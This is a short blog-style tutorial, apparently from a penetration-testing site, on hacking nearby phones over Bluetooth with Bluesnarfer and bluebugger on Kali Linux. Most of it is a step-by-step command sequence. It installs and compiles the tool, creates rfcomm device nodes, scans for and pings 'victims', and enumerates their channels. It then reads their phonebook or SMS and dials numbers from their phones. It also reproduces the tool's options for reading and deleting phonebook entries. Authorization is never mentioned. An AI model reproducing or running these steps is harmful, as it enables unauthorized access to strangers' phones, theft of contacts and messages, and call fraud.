Penetration Testing

(Kali Linux Tutorial) How To Hack Phones With Bluetooth!

A brief tutorial on how to hack a phone via Bluetooth using Bluesnarfer. For Backtrack/Kali Linux: First, we must install Bluesnarfer Make your way to the opt directory.

cd /opt

Get Bluesnarfer using the wget command

/opt# wget

Reopen the directory using the ls command and you will see Bluesnarfer in there, now we have to extract it.

/opt# ls

To extract we use the simple tar xvf command

/opt# tar xvf bluesnarfer.tar.gz

Reopen the directory once again and you will see Bluesnarfer there

/opt# ls

Let’s enter that folder so

/opt# cd bluesnarfer

Now we finish it off by compiling the installation like this

/opt/bluesnarfer# make

To see all of the Bluesnarfer commands run this command ./bluesnarfer

:/opt/bluesnarfer# ./bluesnarfer

Now that we have Bluesnarfer, you must configure rfcomm first, if you haven’t already done that,

mkdir -p /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
mknod --mode=666 /dev/rfcomm0 c 216 0
hciconfig -i hci0 up
hciconfig hci0

(Scan for victims)

hcitool scan hci0

(ping the victim to see if he is awake)

l2ping  < victim mac addr>

(browse the victim for rfcomm channels to connect to)

sdptool browse --tree --l2cap < mac addr >

(then you can use bluesnarfer for example to read the victim’s phonebook, dial a number or read Sms or other things.)

Bluesnarfer -r 1-100 -C 7 -b < mac addr >

(to see available options to do )

bluebugger -h

(Dial number )

bluebugger -m < victim name > -c 7 -a < mac addr > Dial < number >

Extra: This is what the Bluesnarfer shell should look like

bluesnarfer, version 0.1 -
usage: bluesnarfer [options] [ATCMD] -b bt_addrATCMD: valid AT+CMD (GSM EXTENSION)TYPE: valid phonebook type ..
example: "DC" (dialed call list)
"SM" (SIM phonebook)
"RC" (recevied call list)
"XX" much more-b bdaddr: Bluetooth device address
-C chan: Bluetooth rfcomm channel-c ATCMD: custom action
-r N-M: read phonebook entry N to M
-w N-M: delete phonebook entry N to M
-f name: search "name" in phonebook address
-s TYPE: select phonebook memory storage
-l: list available phonebook memory storage
-i: device info

If you have any questions regarding Bluetooth hacking or need help capturing packets or anything specific make sure to post your thread here:

Noor Qureshi

Experienced Founder with a demonstrated history of working in the computer software industry. Skilled in Network Security and Information Security.

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button